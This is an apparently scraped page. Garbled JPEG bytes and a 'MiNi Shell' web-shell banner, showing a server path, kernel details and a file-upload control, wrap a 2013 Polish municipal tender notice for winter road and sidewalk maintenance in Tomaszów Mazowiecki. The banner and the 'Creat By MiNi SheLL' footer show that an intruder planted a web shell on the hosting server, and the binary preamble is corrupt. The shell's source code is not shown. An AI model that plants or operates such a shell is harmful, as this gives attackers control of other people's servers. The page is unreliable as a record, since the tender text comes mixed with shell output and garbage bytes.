JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131115/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131115/241857-N-2013.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Usługi transportowo - sprzętowe w 2014 roku dotyczące zimowego utrzymania dróg gminnych i wewnętrznych stanowiących własność Gminy - Miasto Tomaszów Mazowiecki oraz chodników zlokalizowanych w pasach drogowych innych dróg, jeśli bezpośrednio przylegają do granic nieruchomości stanowiących własność Gminy - Miasto Tomaszów Mazowiecki.</b><br>
<b>Numer ogłoszenia: 241857 - 2013; data zamieszczenia: 15.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Tomaszów Mazowiecki , ul. POW 10/16, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 23 11, faks 44 724 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-maz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi transportowo - sprzętowe w 2014 roku dotyczące zimowego utrzymania dróg gminnych i wewnętrznych stanowiących własność Gminy - Miasto Tomaszów Mazowiecki oraz chodników zlokalizowanych w pasach drogowych innych dróg, jeśli bezpośrednio przylegają do granic nieruchomości stanowiących własność Gminy - Miasto Tomaszów Mazowiecki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi transportowo - sprzętowe w 2014 roku przy zimowym utrzymaniu dróg gminnych i wewnętrznych oraz chodników znajdujących się w pasach drogowych dróg zaliczonych do pozostałych kategorii dróg publicznych w przypadku chodników położonych bezpośrednio przy granicach nieruchomości stanowiących własność Gminy - Miasto Tomaszów Mazowiecki, a w szczególności:
    
 Cześć A:

     a. odśnieżanie dróg
     b. odśnieżanie obiektów mostowych
     c. zwalczanie śliskości na drogach
     d. zwalczanie śliskości na obiektach mostowych.

     Usługi będą realizowane zgodnie z przyjętymi standardami zimowego utrzymania 
     oraz Szczegółową Specyfikacją Techniczną .
     Wykaz niezbędnego sprzętu do odśnieżania dróg i zwalczania sliskości na drogach:
     - min. 3 piaskarki ze środkami transportu
     - min. 3 samochody z pługiem
     - min. 1 rozsypywarka z systemem nawilżania soli
     - min. 1 ładowarka
     - min. 1 równiarka
    
     Cześć B:

     Zimowe utrzymanie chodników znajdujących się w pasach drogowych:
dróg gminnych i wewnętrznych stanowiących własność Gminy - Miasto Tomaszów Mazowiecki - w przypadku chodników, które nie są położone bezpośrednio przy liniach rozgraniczających pasa drogowego,
dróg zaliczonych do pozostałych kategorii dróg publicznych - w przypadku chodników położonych bezpośrednio przy granicach nieruchomości stanowiących własność Gminy - Miasto Tomaszów Mazowiecki.

Zimowe utrzymanie chodników obejmuje:
stałe utrzymanie chodników
interwencyjne utrzymanie chodników.

Stałe utrzymanie chodników polega na ich odśnieżaniu i posypaniu piaskiem w przypadku wystąpienia pokrywy śnieżnej oraz śliskości zimowej bądź jedynie posypanie piaskiem          w przypadku wystąpienia śliskości. 
Czas reakcji Wykonawcy na rozpoczęcie czynności jw. nie powinien być dłuższy niż               2 godziny od chwili powzięcia informacji o takiej konieczności lub od momentu wystąpienia warunków atmosferycznych, które obligują Wykonawcę do jej rozpoczęcia. 
Wykaz chodników do stałego zimowego utrzymania - według załącznika do siwz.

Interwencyjne utrzymanie chodników obejmuje czynności jak w przypadku stałego utrzymania, jednak ich podjęcie następuje jedynie po zgłoszeniu telefonicznym przez Zamawiającego. Zgłoszenie telefoniczne będzie potwierdzone na piśmie przez Zamawiającego. Dopuszcza się dokonanie potwierdzenia za pośrednictwem poczty elektronicznej. Rozpoczęcie czynności interwencyjnego utrzymania chodników nastąpi nie później niż 2 godziny od zgłoszenia konieczności ich realizacji przez Zamawiającego.
Zakres zleconych usług interwencyjnych zostanie każdorazowo określony przez Zamawiającego. 
Wykaz chodników do interwencyjnego zimowego utrzymania - według załącznika do siwz.
Wywóz śniegu z chodników następować będzie jedynie po zgłoszeniu telefonicznym przez Zamawiającego. Zgłoszenie telefoniczne będzie potwierdzone na piśmie przez Zamawiającego. Dopuszcza się dokonanie potwierdzenia za pośrednictwem poczty elektronicznej. Rozpoczęcie czynności wywozu śniegu z chodników nastąpi nie później niż 2 godziny od zgłoszenia konieczności ich realizacji przez Zamawiającego.
Zakres zleconych usług wywozu śniegu z chodników  zostanie każdorazowo określony przez Zamawiającego. 

     Standardy zimowego utrzymania chodników:
w przypadku ciągłych opadów śniegu należy zapewnić możliwość przejścia na połowie szerokości chodnika; zgarnięty śnieg należy pryzmować na trawnikach a w przypadku ich braku przy krawędzi jezdni, 
po ustaniu opadów śniegu chodniki winny być odśnieżone w ciągu 2 godzin od ustania opadów oraz równomiernie posypane piaskiem na całej szerokości chodnika, za wyjątkiem przypadków, kiedy konieczne będzie pryzmowanie śniegu na chodniku,
w przypadku wystąpienia śliskości zimowej niezależnie od opadów należy niezwłocznie przystąpić do posypania nawierzchni chodnika piaskiem.

     Standardy zimowego utrzymania chodników dotyczą zarówno utrzymania stałego jak           
     i utrzymania interwencyjnego.

      Zasady odbioru usług związanych z zimowym utrzymaniem chodników.

Odbiorowi podlega każdy element pracy. Odbiór odbywa się po wykonaniu usług na podstawie potwierdzeń wykonanych przez Zamawiającego .
Odbiór częściowy wyrywkowy odbywa się w ciągu 2 - 3 godzin od wykonania pracy, o ile warunki pogodowe nie niwelują efektów wykonanej pracy.
W przypadku stwierdzenia nieuzasadnionych odstępstw od ustalonych standardów, Wykonawca ponosi kary, zgodnie z podpisaną umową..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.21.00.00-2, 90.21.10.00-9, 90.21.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 
	Część A - 15 000, 00 zł (słownie: piętnaście tysięcy złotych),
	Część B - 2 000,00 zł (słownie: dwa tysiące złotych),</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny: 
dotyczy tylko części A
Zamawiający uzna, iż Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielnie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje, co najmniej 1 usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia. Przez usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia Zamawiający będzie rozumiał wykonanie/wykonywanie usług transportowo sprzętowych przy zimowym utrzymaniu dróg, o wartości min. 500 000,00 pln brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sposób oceny
dotyczy tylko części A
Zamawiający uzna, że wykonawca spełnia warunek, jeżeli wykaże, iż dysponuje lub będzie dysponował następującymi urządzeniami niezbędnymi do zrealizowania zamówienia:
- 	min. 3 piaskarkami ze środkami transportu,
-	min. 3 samochodami z pługiem,
-	min. 1 rozsypywarką z systemem nawilżania soli,
- 	min. 1 równiarką,
-	min. 1 ładowarką,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dotyczy części A
Zamawiający uzna, iż wykonawca spełnia warunek, jeżeli wykaże, iż: posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 400 000,00 PLN (czterysta tysięcy złotych),
	
Zamawiający wymaga, ażeby z przedstawionego powyżej dokumentu w sposób jednoznaczny wynikało, że wykonawca posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 400 000 zł. 

dotyczy części B
Zamawiający uzna, iż wykonawca spełnia warunek, jeżeli wykaże, iż: posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 50 000,00 PLN (pięćdziesiąt tysięcy złotych),

Zamawiający wymaga, ażeby z przedstawionego powyżej dokumentu w sposób jednoznaczny wynikało, że wykonawca posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 50 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany Formularz Oferty,
Pełnomocnictwo, jeżeli dotyczy,
Wypełniony wykaz cen jednostkowych brutto,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza możliwość zmiany istotnych postanowień umowy, w zakresie terminu realizacji zamówienia, technologii wykonywania usług, wynagrodzenia, z zastrzeżeniem ust. 2, 3 i 
2.	Zmiana terminu realizacji przedmiotu zamówienia może nastąpić jedynie w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Okolicznościami takimi mogą być w szczególności:
			1)	ograniczenia w dostępie do terenu objętego usługami,
			2)	wyjątkowo niekorzystne warunki atmosferyczne uzasadniające wcześniejsze 				rozpoczęcie lub późniejsze zakończenie realizacji usług objętych niniejszą umową.
			3)	katastrofy, akty wandalizmu,
			4)	konieczność realizacji zamówień dodatkowych,
	3.	W szczególnych przypadkach na wniosek wykonawcy lub zamawiającego, możliwa jest 	zmiana w 	sposobie wykonywania usługi. 
		1)	Zmiana powyższa jest możliwa, gdy proponowane rozwiązanie jest równorzędne lub 			lepsze funkcjonalnie, jakościowo i technicznie od przewidzianego w opisie przedmiotu 			zamówienia, a jednocześnie nie spowoduje zwiększenia kosztów realizacji przedmiotu 			umowy. 
		2)	W przypadku zmiany powszechnie obowiązujących przepisów prawa i norm odnoszących 		się do przedmiotu zamówienia.
		3)	Druga strona musi wyrazić pisemną zgodę na dokonanie zmiany.
	4.	Wykonawca zobowiązany jest uzyskać każdorazowo zgodę zamawiającego na realizację 	ewentualnych prac zamiennych, dodatkowych. Jeżeli wykonawca dokona ich realizacji bez 	wymaganej zgody, zamawiający zastrzega sobie prawo do odmowy zapłaty wynagrodzenia za te 	roboty.
	5.	Bez zgody zamawiającego mogą być wykonywane jedynie prace mające na celu niezwłoczne 	zapobieżenie awarii, szkodzie lub utracie życia i zdrowia, o czym wykonawca zobowiązany jest 	natychmiast zawiadomić zamawiającego.
	6.	Zamówienia dodatkowe mogą być realizowane wyłącznie na mocy odrębnych umów zgodnie z art. 	67 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-maz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Mościckiego 6 pok. nr. 6 (II p.) - Wydział Inwestycji Urzędu Miasta w Tomaszowie Mazowieckim..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2013 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Tomaszowie Maz. ul. POW 10/16 pok. 12 budynek A 	(kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A - Zimowe utrzymanie dróg,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a/ odśnieżanie dróg
     b/ odśnieżanie obiektów mostowych
     c/ zwalczanie śliskości na drogach
     d/ zwalczanie śliskości na obiektach mostowych.

     Usługi będą realizowane zgodnie z przyjętymi standardami zimowego utrzymania 
     / załącznik nr 5 / oraz Szczegółową Specyfikacją Techniczną .
     Wykaz niezbędnego sprzętu do odśnieżania dróg i zwalczania sliskości na drogach:
     - min. 3 piaskarki ze środkami transportu
     - min. 3 samochody z pługiem
     - min. 1 rozsypywarka z systemem nawilżania soli
     - min. 1 ładowarka
     - min. 1 równiarka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B - Zimowe utrzymanie chodników,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie chodników znajdujących się w pasach drogowych:
dróg gminnych i wewnętrznych stanowiących własność Gminy - Miasto Tomaszów Mazowiecki - w przypadku chodników, które nie są położone bezpośrednio przy liniach rozgraniczających pasa drogowego,
dróg zaliczonych do pozostałych kategorii dróg publicznych - w przypadku chodników położonych bezpośrednio przy granicach nieruchomości stanowiących własność Gminy - Miasto Tomaszów Mazowiecki.

Zimowe utrzymanie chodników obejmuje:
stałe utrzymanie chodników
interwencyjne utrzymanie chodników.

Stałe utrzymanie chodników polega na ich odśnieżaniu i posypaniu piaskiem w przypadku wystąpienia pokrywy śnieżnej oraz śliskości zimowej bądź jedynie posypanie piaskiem          w przypadku wystąpienia śliskości. 
Czas reakcji Wykonawcy na rozpoczęcie czynności jw. nie powinien być dłuższy niż               2 godziny od chwili powzięcia informacji o takiej konieczności lub od momentu wystąpienia warunków atmosferycznych, które obligują Wykonawcę do jej rozpoczęcia. 
Wykaz chodników do stałego zimowego utrzymania - według załącznika do siwz.

Interwencyjne utrzymanie chodników obejmuje czynności jak w przypadku stałego utrzymania, jednak ich podjęcie następuje jedynie po zgłoszeniu telefonicznym przez Zamawiającego. Zgłoszenie telefoniczne będzie potwierdzone na piśmie przez Zamawiającego. Dopuszcza się dokonanie potwierdzenia za pośrednictwem poczty elektronicznej. Rozpoczęcie czynności interwencyjnego utrzymania chodników nastąpi nie później niż 2 godziny od zgłoszenia konieczności ich realizacji przez Zamawiającego.
Zakres zleconych usług interwencyjnych zostanie każdorazowo określony przez Zamawiającego. 
Wykaz chodników do interwencyjnego zimowego utrzymania - według załącznika do siwz.
Wywóz śniegu z chodników następować będzie jedynie po zgłoszeniu telefonicznym przez Zamawiającego. Zgłoszenie telefoniczne będzie potwierdzone na piśmie przez Zamawiającego. Dopuszcza się dokonanie potwierdzenia za pośrednictwem poczty elektronicznej. Rozpoczęcie czynności wywozu śniegu z chodników nastąpi nie później niż 2 godziny od zgłoszenia konieczności ich realizacji przez Zamawiającego.
Zakres zleconych usług wywozu śniegu z chodników  zostanie każdorazowo określony przez Zamawiającego. 

     Standardy zimowego utrzymania chodników:

w przypadku ciągłych opadów śniegu należy zapewnić możliwość przejścia na połowie szerokości chodnika; zgarnięty śnieg należy pryzmować na trawnikach a w przypadku ich braku przy krawędzi jezdni, 
po ustaniu opadów śniegu chodniki winny być odśnieżone w ciągu 2 godzin od ustania opadów oraz równomiernie posypane piaskiem na całej szerokości chodnika, za wyjątkiem przypadków, kiedy konieczne będzie pryzmowanie śniegu na chodniku,
w przypadku wystąpienia śliskości zimowej niezależnie od opadów należy niezwłocznie przystąpić do posypania nawierzchni chodnika piaskiem.

     Standardy zimowego utrzymania chodników dotyczą zarówno utrzymania stałego jak           
     i utrzymania interwencyjnego.

      Zasady odbioru usług związanych z zimowym utrzymaniem chodników.

Odbiorowi podlega każdy element pracy. Odbiór odbywa się po wykonaniu usług na podstawie potwierdzeń wykonanych przez Zamawiającego .
Odbiór częściowy wyrywkowy odbywa się w ciągu 2 - 3 godzin od wykonania pracy, o ile warunki pogodowe nie niwelują efektów wykonanej pracy.
W przypadku stwierdzenia nieuzasadnionych odstępstw od ustalonych standardów, Wykonawca ponosi kary, zgodnie z podpisaną umową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com